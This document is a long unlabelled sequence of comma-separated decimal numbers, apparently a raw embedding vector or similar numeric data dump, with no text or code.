0.0056561436504125595, -0.0026751046534627676, -0.008435048162937164, 0.014400768093764782, 0.00468370970338583, -0.008034419268369675, 0.00006669551657978445, -0.038722552359104156, 0.033419687300920486, -0.017773330211639404, -0.003904305398464203, -0.00472013046965003, 0.031088760122656822, 0.016549592837691307, -0.0031558587215840816, -0.009374703280627728, 0.005900162737816572, -0.023280149325728416, -0.0009961077012121677, 0.001556076924316585, 0.002726093865931034, 0.01455373503267765, -0.020235374569892883, 0.010605725459754467, -0.02845189720392227, 0.000246978277573362, -0.01231750100851059, -0.00592201529070735, -0.02323644421994686, 0.001059844042174518, -0.010008424520492554, 0.004800255876034498, -0.04472469165921211, -0.02271198481321335, 0.0038387479726225138, 0.0026842099614441395, -0.011567233130335808, -0.025334279984235764, 0.027650639414787292, 0.024183383211493492, 0.008886665105819702, -0.01736541837453842, 0.011909588240087032, -0.0009005032479763031, 0.005047917366027832, -0.004741983022540808, 0.00404634652659297, -0.02638319693505764, 0.05632106214761734, -0.006970933172851801, 0.020045986399054527, -0.002979218028485775, -0.03714917600154877, -0.02039562538266182, -0.01695750467479229, 0.004472468979656696, 0.010044845752418041, -0.007458971347659826, 0.0035692343953996897, 0.0008681798353791237, -0.0018337852088734508, -0.008405910804867744, 0.008580731227993965, -0.02226036787033081, 0.012251943349838257, 0.013883593492209911, -0.018749406561255455, -0.027199022471904755, 0.03720744699239731, 0.013016778975725174, -0.023556947708129883, -0.01621452160179615, -0.005262799561023712, 0.028422759845852852, -0.024562159553170204, -0.0067888293415308, -0.012222806923091412, 0.018953362479805946, 0.048891227692365646, -0.003037491347640753, 0.022478891536593437, 0.001813753740862012, 0.017438258975744247, 0.0024893588852137327, 0.002480253577232361, -0.009731627069413662, 0.02845189720392227, 0.015486106276512146, 0.008070840500295162, 0.04947395995259285, 0.006614009849727154, -0.025858739390969276, 0.01630193181335926, 0.050114963203668594, -0.01230293232947588, 0.004341354593634605, -0.025057481601834297, 0.026339493691921234, 0.025174029171466827, -0.013096905313432217, 0.0020213520620018244, 0.027432115748524666, 0.03388587385416031, -0.020890947431325912, -0.04265599325299263, -0.020657854154706, -0.0012328426819294691, -0.004894949961453676, -0.016564160585403442, -0.01902620494365692, -0.01532585546374321, -0.01621452160179615, -0.027111612260341644, -0.04460814595222473, 0.009542238898575306, 0.017088619992136955, -0.01253602560609579, -0.005233663134276867, 0.02463500201702118, 0.021808750927448273, 0.01805012859404087, -0.0069053759798407555, -0.007997998967766762, 0.011596369557082653, 0.018516313284635544, 0.0007775832200422883, -0.004232092294842005, -0.027665209025144577, -0.011232161894440651, -0.012878380715847015, 0.0012164533836767077, 0.011057342402637005, 0.002691494068130851, -0.022274935618042946, 0.006064056418836117, 0.01950695924460888, 0.01799185574054718, 0.023411264643073082, 0.013402839191257954, 0.03443947061896324, -0.026426902040839195, -0.00020054180640727282, -0.04251030832529068, 0.00040131123387254775, -0.00164348678663373, -0.04312217980623245, -0.012047987431287766, -0.029544519260525703, 0.001271084533073008, 0.0009369240142405033, 0.025683918967843056, 0.013701489195227623, -0.0035674134269356728, -0.0018756691133603454, 0.005962078459560871, 0.014131254516541958, 0.03615852817893028, 0.017234303057193756, 0.011203025467693806, 0.014888806268572807, -0.006635862402617931, 0.030156388878822327, -0.02590244449675083, -0.01064214576035738, -0.019040772691369057, 0.01336641889065504, -0.0007976146298460662, 0.003893379122018814, -0.038402047008275986, 0.006340854335576296, 0.014619292691349983, -0.004352280870079994, -0.011749336495995522, 0.0012410373892635107, 0.012324784882366657, -0.013905446045100689, -0.0037240225356072187, 0.01012497115880251, -0.0119168721139431, -0.02784002758562565, -0.009695205837488174, -0.012485036626458168, -0.017409123480319977, -0.0053902724757790565, 0.016141681000590324, -0.030272934585809708, -0.0003275591880083084, 0.01027065422385931, 0.00868270918726921, -0.005423050839453936, 0.008354921825230122, -0.01329357735812664, 0.009746194817125797, -0.0171905979514122, 0.026368629187345505, -0.018239516764879227, 0.017176030203700066, -0.00011461157555459067, -0.004869455471634865, 0.026747405529022217, 0.003998999483883381, -0.013089620508253574, 0.019550664350390434, -0.0024820747785270214, 0.014327926561236382, 0.014131254516541958, 0.0003605655219871551, -0.0170449148863554, -0.008347637951374054, -0.009207167662680149, -0.015762904658913612, 0.019842028617858887, -0.014859669841825962, 0.006949080619961023, -0.027519525960087776, 0.01412397064268589, 0.005976646672934294, 0.0035892657469958067, 0.010831533931195736, 0.016637003049254417, -0.029500814154744148, -0.0030830171890556812, -0.02059958130121231, -0.0011308646062389016, -0.018924226984381676, 0.005222736857831478, -0.012251943349838257, -0.023586083203554153, -0.02125515416264534, -0.022901372984051704, -0.0020286361686885357, 0.0023946647997945547, -0.06771347671747208, 0.0022325925529003143, 0.05620451644062996, -0.014218664728105068, 0.0118440305814147, -0.019929438829421997, -0.004807540215551853, -0.0006118687451817095, 0.05125129222869873, 0.020468465983867645, 0.006978217512369156, 0.01243404671549797, 0.005175389815121889, 0.009673353284597397, -0.007954293861985207, 0.010445473715662956, 0.007306004408746958, 0.00890851765871048, 0.0072222365997731686, -0.0064501166343688965, 0.011406981386244297, 0.005495892371982336, 0.0004989643930457532, -0.018574588000774384, 0.0033962358720600605, 0.035226158797740936, 0.014276937581598759, -0.007094763685017824, 0.035138748586177826, -0.018982499837875366, -0.005969362333416939, -0.0013320893049240112, -0.05113474652171135, -0.03945096582174301, -0.03391500934958458, -0.035022202879190445, 0.005317430943250656, 0.03901391848921776, 0.0004798434965778142, -0.011865883134305477, -0.006923586130142212, -0.0022398766595870256, -0.0053429254330694675, -0.0101104024797678, 0.010991784743964672, -0.02392115443944931, 0.011756621301174164, -0.015529811382293701, 0.004395985510200262, 0.0490369088947773, -0.021561089903116226, -0.007699348498135805, -0.013890877366065979, -0.00022603633988182992, -0.010685850866138935, 0.031525809317827225, 0.029559088870882988, 0.013315429911017418, -0.004341354593634605, -0.03094307705760002, -0.0016653392231091857, -0.005543239414691925, -0.020381057634949684, -0.004599941894412041, 0.00203409930691123, 0.010948080569505692, -0.021779613569378853, 0.008274796418845654, 0.01618538610637188, -0.0013575837947428226, 0.0023946647997945547, -0.003911589737981558, -0.007244089152663946, -0.0068033975549042225, -0.007866883650422096, 0.013410123065114021, -0.00012587924720719457, -0.011436118744313717, -0.01971091516315937, 0.018006423488259315, 0.01373791042715311, -0.03085566684603691, 0.006643146276473999, 0.011880451813340187, 0.0041483244858682156, -0.028539307415485382, -0.017554806545376778, -0.024882663041353226, -0.00701828021556139, -0.021065767854452133, -0.005415766965597868, -0.0052955783903598785, -0.040150243788957596, 0.002995607443153858, 0.03746967762708664, 0.03551752492785454, -0.016462182626128197, 0.014852385967969894, 0.0022325925529003143, -0.007160321343690157, 0.017263440415263176, -0.01687009632587433, 0.005364777985960245, -0.012943937443196774, 0.00892308633774519, 0.016025133430957794, 0.0025895158760249615, 0.00979718379676342, 0.018574588000774384, -0.03362364321947098, -0.010372632183134556, 0.004741983022540808, 0.004133756272494793, -0.006431906018406153, 0.013031347654759884, -0.00007289842324098572, 0.02374633401632309, -0.010511031374335289, -0.010365348309278488, 0.022464323788881302, 0.012528740800917149, -0.01243404671549797, 0.010314359329640865, 0.0068980916403234005, -0.008354921825230122, -0.00709112174808979, 0.01326444000005722, 0.0027060622815042734, -0.0026077262591570616, -0.016797253862023354, -0.007968861609697342, 0.006406411528587341, -0.027024203911423683, -0.029151175171136856, 0.011130183935165405, -0.027111612260341644, 0.010015708394348621, 0.0075828018598258495, 0.006428264081478119, 0.008631720207631588, 0.011822178028523922, 0.01796271838247776, 0.005605154670774937, -0.016170816496014595, 0.0019011636031791568, -0.030156388878822327, 0.007845031097531319, 0.018385199829936028, 0.015704631805419922, -0.007233162876218557, 0.005714416969567537, -0.003827821696177125, -0.028379054740071297, 0.008813823573291302, 0.0014358884654939175, -0.027883732691407204, 0.040325064212083817, -0.017030347138643265, -0.013759762980043888, -0.016578730195760727, -0.025115756317973137, 0.0014713986311107874, -0.0023728124797344208, 0.029777612537145615, 0.007415266707539558, -0.025130324065685272, -0.0036876017693430185, -0.005036991089582443, 0.01027065422385931, 0.04781317338347435, -0.010722271166741848, 0.015136467292904854, 0.000015834493751754053, -0.00698185944929719, -0.0007370651001110673, 0.020803537219762802, -0.0407329760491848, -0.006617651786655188, 0.01534042414277792, 0.014400768093764782, -0.03266213834285736, -0.0058928788639605045, -0.015937723219394684, -0.0019521526992321014, 0.0011818535858765244, -0.012601582333445549, 0.012477751821279526, -0.004290365613996983, 0.02839362435042858, -0.010175960138440132, -0.017613079398870468, 0.013424691744148731, 0.010707703419029713, 0.000038668604247504845, 0.019186455756425858, 0.010576588101685047, 0.002940976293757558, -0.011705632321536541, -0.026543449610471725, -0.012958506122231483, 0.009374703280627728, 0.010663998313248158, -0.0031285432633012533, -0.007917872630059719, -0.0371200367808342, -0.048599861562252045, -0.006053130142390728, -0.01974005065858364, -0.0337984636425972, 0.021094903349876404, -0.007845031097531319, 0.0020304573699831963, 0.01486695371568203, 0.006475611124187708, 0.0063554225489497185, -0.000004933163381792838, -0.004159250762313604, -0.004162892699241638, 0.026689132675528526, 0.014837817288935184, 0.014160390943288803, 0.007837747223675251, 0.016666138544678688, 0.02703877165913582, -0.031584084033966064, -0.012965789996087551, -0.004235734231770039, -0.014131254516541958, 0.0023291076067835093, 0.008347637951374054, -0.006555736530572176, -0.020716127008199692, -0.007779473904520273, -0.010146823711693287, -0.002179782371968031, -0.00004268057818990201, 0.03056430071592331, 0.016651570796966553, 0.017496531829237938, 0.002188887679949403, -0.0004290820797905326, 0.008974075317382812, 0.0045234584249556065, 0.04603584110736847, -0.009520386345684528, -0.031554944813251495, 0.03216681256890297, -0.005397556349635124, 0.008303932845592499, -0.017452828586101532, 0.02466413751244545, -0.0032997208181768656, 0.006901734042912722, 0.00404634652659297, 0.010066697373986244, -0.0040062833577394485, 0.035138748586177826, 0.010678566992282867, 0.027315570041537285, 0.004272154998034239, 0.006293507292866707, -0.039771467447280884, -0.012703560292720795, -0.014393484219908714, 0.015573516488075256, 0.020235374569892883, -0.035226158797740936, 0.02323644421994686, 0.02738841064274311, 0.0363333486020565, -0.009454828687012196, 0.01598142832517624, -0.0289617870002985, 0.02057044394314289, -0.00724773108959198, 0.02735927328467369, -0.001966720912605524, 0.015005352906882763, -0.0185600183904171, -0.03738226741552353, -0.010336210951209068, 0.006868955213576555, -0.04041247442364693, 0.025917012244462967, -0.006158750504255295, -0.0020559518598020077, -0.0033980568405240774, -0.02454759180545807, -0.022726554423570633, -0.009214452467858791, -0.010438189841806889, -0.026193810626864433, -0.005058843642473221, 0.0010944438399747014, -0.004017209634184837, 0.009258156642317772, 0.000251530873356387, 0.02478068508207798, -0.00987002532929182, -0.02919488027691841, 0.01810840144753456, 0.011355992406606674, -0.011195741593837738, -0.010285221971571445, -0.0117711890488863, -0.004388701636344194, -0.006890807766467333, -0.0032159530092030764, 0.0120625551789999, -0.002746125217527151, -0.010962648317217827, 0.0034563299268484116, 0.004676425363868475, 0.007539097219705582, -0.01365050021559, -0.010948080569505692, 0.0038715265691280365, -0.01397828757762909, -0.005532313138246536, 0.017598511651158333, 0.03359450772404671, -0.004410553723573685, -0.0067888293415308, 0.03543011471629143, -0.009061484597623348, -0.030972212553024292, -0.005262799561023712, -0.0010489178821444511, -0.009622364304959774, 0.01621452160179615, -0.0038715265691280365, -0.012973074801266193, 0.013912729918956757, -0.00906876940280199, -0.001261979341506958, -0.020118827000260353, -0.025334279984235764, -0.0005012407200410962, -0.010285221971571445, -0.00030593437259085476, 0.005951152183115482, -0.011589085683226585, 0.017496531829237938, -0.0046582152135670185, 0.010081266053020954, 0.011800325475633144, -0.00385331641882658, 0.01058387290686369, 0.011654643341898918, 0.009848172776401043, 0.005382988136261702, -0.005867384374141693, -0.005918373353779316, -0.011829462833702564, -0.006220665760338306, 0.0101832440122962, -0.009330998174846172, -0.006413695868104696, -0.046589434146881104, 0.026849383488297462, -0.00038173506618477404, -0.006923586130142212, 0.033477962017059326, -0.0083767743781209, -0.029690202325582504, -0.0154569698497653, 0.02979218028485775, -0.015529811382293701, -0.017263440415263176, -0.0030975856352597475, -0.0029737548902630806, -0.014575587585568428, -0.006890807766467333, 0.0026386838871985674, 0.019011635333299637, 0.008668140508234501, -0.007611938752233982, -0.020992925390601158, 0.008668140508234501, 0.014160390943288803, 0.005299220327287912, -0.012353921309113503, 0.005179031752049923, 0.011217594146728516, -0.006286222953349352, -0.02220209501683712, 0.01443718932569027, 0.00040472569526173174, -0.023790039122104645, 0.013177030719816685, -0.010831533931195736, 0.009593227878212929, 0.003159500891342759, -0.05582574009895325, 0.00846418458968401, 0.007287793792784214, 0.017715057358145714, 0.030331207439303398, -0.007324214559048414, 0.02492636814713478, 0.033244870603084564, 0.012550593353807926, -0.006304433569312096, 0.0289617870002985, 0.012878380715847015, 0.0034490458201617002, 0.023454967886209488, -0.00018153472046833485, 0.009578659199178219, 0.017263440415263176, 0.0020086048170924187, 0.0069454386830329895, -0.014976216480135918, -0.018035558983683586, 0.0013211630284786224, -0.011538096703588963, 0.03889736905694008, 0.013635932467877865, -0.019434116780757904, 0.0038423901423811913, 0.01289294846355915, 0.02300335094332695, 0.0010807859944179654, -0.0011827641865238547, 0.002460222225636244, 0.03292436525225639, -0.002928229048848152, 0.031001349911093712, 0.01867656596004963, -0.015995997935533524, -0.009214452467858791, -0.00892308633774519, -0.05331999063491821, 0.021561089903116226, -0.022012706845998764, 0.011363277211785316, -0.01448089350014925, -0.015369560569524765, -0.016972074285149574, 0.014327926561236382, -0.014713986776769161, 0.00761922262609005, 0.0051644635386765, -0.0429764948785305, -0.01448089350014925, 0.014488178305327892, -0.03225422278046608, 0.033215731382369995, 0.01609797589480877, 0.008507889695465565, 0.017525669187307358, 0.013446544297039509, -0.006628578063100576, -0.021444542333483696, 0.00008137763506965712, -0.005597870796918869, 0.005667069926857948, -0.019608937203884125, -0.013759762980043888, 0.010066697373986244, 0.007830463349819183, -0.004942297004163265, -0.019069910049438477, 0.01805012859404087, -0.012069839984178543, -0.0027224516961723566, 0.01027065422385931, -0.019171888008713722, 0.013599511235952377, 0.0005617901915684342, 0.0012756370706483722, 0.014065696857869625, -0.007204025983810425, 0.00763379130512476, 0.018297789618372917, -0.012827391736209393, -0.005182674154639244, -0.013373702764511108, -0.024168815463781357, 0.003239626530557871, -0.0015879450365900993, -0.007830463349819183, 0.008813823573291302, -0.0008968611946329474, 0.020177099853754044, -0.013213451020419598, 0.007932441309094429, 0.02483895793557167, -0.007426192983984947, 0.002409233245998621, 0.0490369088947773, -0.008070840500295162, -0.02279939502477646, -0.0034490458201617002, 0.0337984636425972, 0.010001140646636486, -0.017423691228032112, 0.011137467809021473, 0.01223009079694748, 0.007098406087607145, -0.0023200022988021374, -0.011210309341549873, -0.00452710036188364, 0.010460042394697666, 0.019375843927264214, 0.010358063504099846, 0.0028681347612291574, -0.020788969472050667, 0.004767477512359619, 0.01758394204080105, -0.00997200421988964, -0.03566320613026619, 0.0029828601982444525, -0.004126471932977438, -0.017409123480319977, 0.006428264081478119, 0.006206097546964884, 0.02223123051226139, 0.003062985837459564, -0.015748336911201477, 0.058972492814064026, 0.006195171270519495, -0.008711845614016056, 0.00885024480521679, -0.018720269203186035, 0.019550664350390434, -0.011224878020584583, 0.02140083722770214, -0.011647358536720276, -0.010831533931195736, -0.0015915872063487768, -0.01968177780508995, 0.03525529429316521, 0.0019430475076660514, 0.03050602786242962, -0.015588085167109966, -0.01449546217918396, 0.014764975756406784, -0.014233232475817204, 0.00042316369945183396, -0.033477962017059326, -0.0025986211840063334, -0.028291646391153336, -0.013541238382458687, 0.007662927731871605, -0.007083837408572435, 0.008828392252326012, 0.016316499561071396, 0.012710845097899437, -0.006362706422805786, -0.00009725480776978657, -0.021444542333483696, -0.00772848492488265, 0.012011566199362278, 0.008311217650771141, -0.005051559302955866, 0.01185859926044941, -0.01526758261024952, 0.009360134601593018, 0.003937084227800369, -0.012164533138275146, 0.012790970504283905, 0.033419687300920486, -0.01867656596004963, -0.0029865021351724863, 0.007076553534716368, 0.0034308354370296, -0.012113544158637524, -0.008493321016430855, 0.01979832537472248, -0.02208554744720459, -0.009673353284597397, -0.013024063780903816, -0.004687351640313864, -0.014626576565206051, 0.003123080125078559, -0.0032250583171844482, -0.0016962968511506915, 0.010394484736025333, 0.04224808141589165, 0.017394553869962692, 0.019317571073770523, -0.005659786053001881, 0.0008294828003272414, -0.01979832537472248, 0.024503886699676514, -0.01758394204080105, 0.0027024203445762396, -0.021357133984565735, -0.00190844782628119, -0.022478891536593437, 0.011203025467693806, 0.029457109048962593, -0.01237577386200428, -0.014240516349673271, 0.01592315547168255, -0.0028881661128252745, -0.01161822210997343, -0.017321713268756866, -0.005772690288722515, -0.029923295602202415, -0.0171905979514122, 0.006512031890451908, 0.000954223913140595, 0.008551593869924545, 0.005841889884322882, -0.007393414154648781, 0.0021816035732626915, 0.011996998451650143, 0.015354991890490055, -0.017452828586101532, -0.011996998451650143, -0.01117388904094696, 0.0030830171890556812, 0.0102560855448246, -0.018268652260303497, -0.002631399780511856, -0.010103118605911732, -0.007367919664829969, 0.018399767577648163, -0.02446018159389496, 0.01713232509791851, -0.012557878158986568, -0.02154652029275894, 0.004199313465505838, 0.006180602591484785, -0.004858529195189476, -0.014364347793161869, 0.015296719036996365, 0.0015214772429317236, -0.009789899922907352, 0.0021069408394396305, 0.011829462833702564, -0.006337211932986975, 0.0005271905101835728, -0.02629578858613968, 0.03371105343103409, 0.013126041740179062, 0.004239376168698072, -0.003361636074259877, -0.0036202233750373125, -0.0044761113822460175, -0.0002638228761497885, -0.020949220284819603, -0.005240947008132935, -0.0049787177704274654, -0.015092762187123299, 0.0075973705388605595, -0.02211468480527401, -0.00896679051220417, 0.011071911081671715, -0.007976146414875984, -0.010824249126017094, 0.010948080569505692, 0.0019794681575149298, -0.01078782882541418, 0.013635932467877865, 0.018181242048740387, -0.018370630219578743, 0.025509100407361984, -0.009760763496160507, 0.01796271838247776, 0.003536455798894167, 0.025188596919178963, -0.027694344520568848, 0.02727186493575573, -0.008070840500295162, 0.004235734231770039, -0.00588559452444315, 0.014845101162791252, -0.0016025133663788438, 0.022508028894662857, 0.0020978357642889023, -0.0008112724171951413, 0.037994135171175, -0.0005303773214109242, 0.014917942695319653, 0.0008053540368564427, -0.004446974489837885, -0.0061660343781113625, 0.02125515416264534, -0.019317571073770523, -0.01244861539453268, 0.007225878536701202, 0.01239034254103899, 0.02113860845565796, -0.013825319707393646, -0.000342355138855055, -0.013468396849930286, -0.01027065422385931, -0.016607865691184998, -0.012783686630427837, -0.0047456249594688416, 0.008267512544989586, 0.016491319984197617, 0.018865952268242836, -0.011734768748283386, 0.009432976134121418, -0.008624435402452946, -0.009717058390378952, 0.03382759913802147, 0.016607865691184998, -0.004734698683023453, -0.02054130844771862, -0.013767046853899956, 0.005696206819266081, -0.003055701730772853, -0.004246660508215427, 0.018632860854268074, 0.011800325475633144, 0.029180312529206276, -0.010008424520492554, -0.002523958683013916, -0.00464728893712163, 0.00883567612618208, 0.009076053276658058, 0.0203664880245924, -0.0011827641865238547, -0.017802467569708824, 0.009644216857850552, 0.018778543919324875, -0.007145753130316734, 0.009119758382439613, -0.01403656043112278, 0.022158389911055565, 0.008704561740159988, -0.009134326130151749, 0.0371200367808342, -0.007560949772596359, 0.0153841283172369, -0.00928000919520855, -0.013810751959681511, -0.009520386345684528, -0.022041844204068184, 0.002094193594530225, -0.022901372984051704, 0.00799071416258812, 0.012601582333445549, 0.010540167801082134, -0.019099045544862747, -0.006675925105810165, 0.006522958166897297, -0.015719199553132057, 0.020861810073256493, 0.02902005985379219, 0.004446974489837885, 0.0012401267886161804, 0.0016780864680185914, 0.009935582987964153, -0.012594298459589481, 0.0057981847785413265, 0.003864242462441325, 0.00025471768458373845, 0.011348708532750607, 0.017205165699124336, 0.010634861886501312, 0.004723772406578064, 0.0020104257855564356, 0.013810751959681511, -0.0036493600346148014, -0.016782686114311218, -0.0036493600346148014, 0.008420479483902454, 0.012638003565371037, 0.0071821738965809345, 0.01641847752034664, -0.003159500891342759, 0.014065696857869625, -0.006792471744120121, -0.004836676642298698, -0.016316499561071396, -0.004712846130132675, 0.009906446561217308, -0.0009219004423357546, 0.009389271959662437, 0.015748336911201477, 0.00997200421988964, -0.01117388904094696, -0.016738981008529663, -0.05291207879781723, 0.02706790901720524, -0.009148894809186459, 0.0013566733105108142, -0.027577798813581467, -0.013380986638367176, -0.008260227739810944, -0.020468465983867645, 0.006493821274489164, -0.018268652260303497, -0.01799185574054718, -0.0007243178552016616, -0.01055473554879427, 0.01072955597192049, -0.0035146032460033894, 0.012368489988148212, -0.014313357882201672, -0.00899592787027359, 0.025479963049292564, 0.0023691703099757433, 0.010277938097715378, 0.017379986122250557, -0.0076774959452450275, -0.01153081189841032, 0.009848172776401043, 0.0025804108008742332, -0.022988783195614815, 0.002815324580296874, 0.004304933827370405, -0.0011053700000047684, 0.0003009265346918255, -0.006730556488037109, 0.00426122872158885, 0.017409123480319977, -0.010401768609881401, -0.005051559302955866, 0.012193670496344566, -0.0069527230225503445, 0.004173818975687027, -0.00570713309571147, -0.0018519955920055509, -0.01163279078900814, -0.019404981285333633, -0.003729485673829913, -0.0008672693511471152, 0.02575676143169403, -0.011516244150698185, 0.011341424658894539, -0.010190528817474842, -0.00002300483174622059, -0.019201023504137993, 0.004170177038758993, -0.003612939268350601, -0.00006350869807647541, 0.024736979976296425, 0.038314636796712875, -0.011996998451650143, -0.028714125975966454, 0.010838817805051804, -0.01102820597589016, 0.024023132398724556, -0.0007807700312696397, -0.0028007563669234514, -0.0033215731382369995, 0.005932941567152739, 0.009403839707374573, -0.006566662807017565, -0.002081446349620819, 0.02291594073176384, -0.002711525419726968, -0.005863741971552372, -0.005637933500111103, -0.007076553534716368, 0.013431975618004799, -0.01888052187860012, 0.007874168455600739, 0.011130183935165405, 0.000592747877817601, -0.002791651291772723, 0.010846101678907871, -0.008347637951374054, -0.00761922262609005, 0.01547153852880001, -0.005372061859816313, 0.026659995317459106, -0.012419478967785835, 0.0035874447785317898, 0.010365348309278488, 0.007251373026520014, -0.015019920654594898, -0.006461042445152998, -0.005044274963438511, -0.02282853238284588, -0.026120968163013458, 0.0013730626087635756, 0.015588085167109966, -0.006158750504255295, -0.002294507808983326, -0.01770048961043358, -0.003948010504245758, 0.003911589737981558, 0.0153841283172369, -0.02365892566740513, -0.005404840689152479, 0.010372632183134556, -0.013810751959681511, 0.022595439106225967, -0.015486106276512146, -0.001470488146878779, -0.0009360135300084949, -0.012739981524646282, -0.013606795109808445, 0.0017527490854263306, 0.02039562538266182, -0.009636932983994484, -0.0007170336903072894, -0.021837886422872543, -0.0006455579423345625, 0.012412195093929768, -0.008180102333426476, -0.003458151128143072, -0.013388271443545818, 0.023396695032715797, 0.006129613611847162, -0.006005783099681139, -0.024620432406663895, 0.02362978830933571, -0.020526740700006485, 0.030243799090385437, 0.0012501425808295608, 0.000001476036572967132, -0.009447544813156128, 0.009622364304959774, 0.012441331520676613, -0.0062133814208209515, -0.0009560449398122728, -0.008507889695465565, 0.011836746707558632, 0.0022216662764549255, -0.010401768609881401, -0.01810840144753456, 0.013847172260284424, -0.016884664073586464, -0.0022999709472060204, -0.026397766545414925, -0.013774330727756023, 0.011443402618169785, 0.009615080431103706, -0.02976304478943348, 0.004395985510200262, -0.015792042016983032, 0.0032724051270633936, -0.020949220284819603, 0.010336210951209068, 0.014684850350022316, -0.02317817136645317, 0.005419408902525902, -0.0030720909126102924, 0.008653572760522366, -0.0022034558933228254, -0.023819176480174065, -0.00622430769726634, -0.023819176480174065, 0.005211810581386089, -0.004039062187075615, 0.001977647189050913, -0.016287364065647125, -0.00249300105497241, -0.003769548609852791, 0.020322782918810844, 0.01603970304131508, 0.01455373503267765, -0.003480003448203206, -0.007553665433079004, 0.0031485746148973703, 0.004399627912789583, -0.006107761058956385, 0.024533024057745934, -0.018487177789211273, -0.01716146245598793, -0.013096905313432217, -0.009061484597623348, -0.004960507154464722, -0.007185815833508968, -0.0005440351087599993, -0.007903304882347584, -0.002494822023436427, 0.019201023504137993, -0.01440805196762085, -0.003095764433965087, -0.00885024480521679, -0.021648498252034187, 0.011305003426969051, -0.0007361546158790588, -0.007287793792784214, 0.0035237083211541176, -0.017088619992136955, -0.043588362634181976, -0.008027135394513607, 0.016025133430957794, -0.0005390272126533091, -0.0045088897459208965, 0.003307004924863577, -0.003170427167788148, -0.0022671923507004976, -0.022959645837545395, 0.008405910804867744, 0.0014896090142428875, -0.002678746823221445, 0.004771119449287653, 0.01609797589480877, 0.0008640824817121029, 0.0019503316143527627, -0.004905876237899065, 0.026397766545414925, -0.021444542333483696, -0.00809269305318594, 0.012266512028872967, 0.018385199829936028, 0.006377275101840496, -0.01311875693500042, -0.003143111476674676, 0.0036784966941922903, -0.013162462040781975, 0.00041792821139097214, 0.0083767743781209, -0.006122329737991095, 0.012994926422834396, -0.03746967762708664, 0.012251943349838257, 0.012332068756222725, -0.009848172776401043, -0.0021816035732626915, -0.010685850866138935, 0.025159459561109543, 0.011035489849746227, -0.006319001782685518, 0.02113860845565796, 0.01793358102440834, -0.009025064297020435, 0.01790444552898407, 0.0008827481651678681, 0.006614009849727154, -0.001946689561009407, 0.015879450365900993, -0.007939725182950497, 0.022872237488627434, -0.014677565544843674, 0.0069527230225503445, -0.010751408524811268, 0.00988459400832653, -0.01327900867909193, 0.012281079776585102, -0.012798254378139973, 0.011392413638532162, 0.017496531829237938, -0.001798274926841259, 0.003662107279524207, -0.013271724805235863, -0.0040609147399663925, -0.004741983022540808, 0.0020686991047114134, 0.011581801809370518, -0.00982632115483284, -0.0029865021351724863, -0.04084952175617218, -0.00036967071355320513, -0.0013357313582673669, 0.007611938752233982, 0.014728554524481297, -0.015515243634581566, -0.0069527230225503445, -0.013643216341733932, 0.04242290183901787, -0.0035400977358222008, -0.01564635895192623, -0.02226036787033081, 0.031234443187713623, 0.020162532106041908, -0.015704631805419922, 0.0029828601982444525, -0.005539597477763891, 0.004785687662661076, 0.014342495240271091, 0.00245658028870821, -0.009913730435073376, 0.005721701309084892, 0.0070801954716444016, -0.007149395067244768, -0.003307004924863577, 0.02131342887878418, 0.01615624874830246, 0.0033689201809465885, 0.029340563341975212, 0.016287364065647125, 0.00020350099657662213, 0.019973143935203552, -0.029180312529206276, -0.010846101678907871, -0.0007006443338468671, 0.014349779114127159, -0.027810892090201378, -0.007255014963448048, 0.001740001724101603, 0.013781615532934666, 0.015719199553132057, -0.017685920000076294, 0.010292506776750088, -0.008435048162937164, 0.002296328777447343, 0.0043741329573094845, -0.01442262064665556, 0.0120625551789999, 0.008114544674754143, 0.013111473061144352, -0.03228336200118065, -0.015602652914822102, -0.016258226707577705, -0.0013803467154502869, -0.0027716197073459625, 0.030039841309189796, -0.02443104423582554, 0.018895089626312256, 0.0038788109086453915, 0.018924226984381676, -0.0037276647053658962, 0.005849173758178949, -0.004884023685008287, -0.014684850350022316, 0.0056561436504125595, -0.009250872768461704, 0.019885733723640442, 0.004763835109770298, -0.01526758261024952, 0.016433047130703926, 0.019201023504137993, -0.01930300146341324, 0.003152216784656048, -0.00663222000002861, -0.033536236733198166, 0.0014395305188372731, 0.012514173053205013, -0.01764221489429474, -0.007874168455600739, -0.005270083900541067, -0.007378845941275358, -0.00972434226423502, 0.017889875918626785, 0.003469077404588461, -0.003922515548765659, -0.002407412277534604, -0.01638934202492237, 0.01902620494365692, 0.01455373503267765, 0.011436118744313717, 0.010758692398667336, -0.021765045821666718, -0.0030192809645086527, 0.017117757350206375, -0.005361135583370924, 0.01953609474003315, 0.004614510107785463, -0.00860986765474081, -0.027111612260341644, 0.010212380439043045, -0.01193144079297781, 0.02590244449675083, -0.001475040684454143, -0.003103048773482442, -0.009076053276658058, 0.008405910804867744, -0.006176960654556751, -0.01290751714259386, 0.010117687284946442, -0.001517835189588368, -0.006745124701410532, -0.010991784743964672, 0.012528740800917149, -0.023396695032715797, -0.006326285656541586, 0.0004766566853504628, -0.009840888902544975, -0.0007024653605185449, -0.01609797589480877, 0.0018583692144602537, -0.020293647423386574, -0.0020395624451339245, -0.006125971674919128, 0.01147253904491663, 0.017569374293088913, 0.006009425036609173, 0.00005514330405276269, -0.012412195093929768, 0.013380986638367176, 0.0020741622429341078, 0.0033306784462183714, -0.001782796112820506, 0.023586083203554153, -0.016287364065647125, 0.026368629187345505, -0.0028863451443612576, -0.0024857167154550552, -0.0017090440960600972, -0.0009824499720707536, -0.0031085116788744926, -0.016913799569010735, 0.015544380061328411, -0.00882110744714737, 0.02110947109758854, 0.022012706845998764, -0.009134326130151749, 0.010307074524462223, 0.016855526715517044, 0.02234777808189392, -0.011283150874078274, 0.007145753130316734, 0.003948010504245758, -0.007051059044897556, 0.0018438008846715093, -0.004042704124003649, 0.000601853069383651, -0.007218594662845135, 0.005310146603733301, 0.012783686630427837, -0.00807812437415123, 0.005157179664820433, -0.030243799090385437, 0.001098085893318057, 0.00885024480521679, 0.002658715471625328, -0.009345566853880882, -0.023469537496566772, -0.006286222953349352, 0.0031467536464333534, 0.01687009632587433, -0.0061660343781113625, -0.0009870026260614395, 0.011610938236117363, 0.010161391459405422, -0.0084496159106493, -0.002931870985776186, -0.0039735049940645695, 0.004894949961453676, 0.021852456033229828, -0.031380124390125275, -0.003769548609852791, 0.00622430769726634, 0.01154538057744503, 0.02730100043118, -0.01117388904094696, -0.001464114524424076, -0.0005558718112297356, 0.007604654412716627, -0.014976216480135918, -0.00896679051220417, 0.008915801532566547, 0.014131254516541958, -0.012805539183318615, 0.011698347516357899, -0.0057508377358317375, -0.022100117057561874, 0.0012410373892635107, 0.0023291076067835093, -0.016607865691184998, 0.01953609474003315, 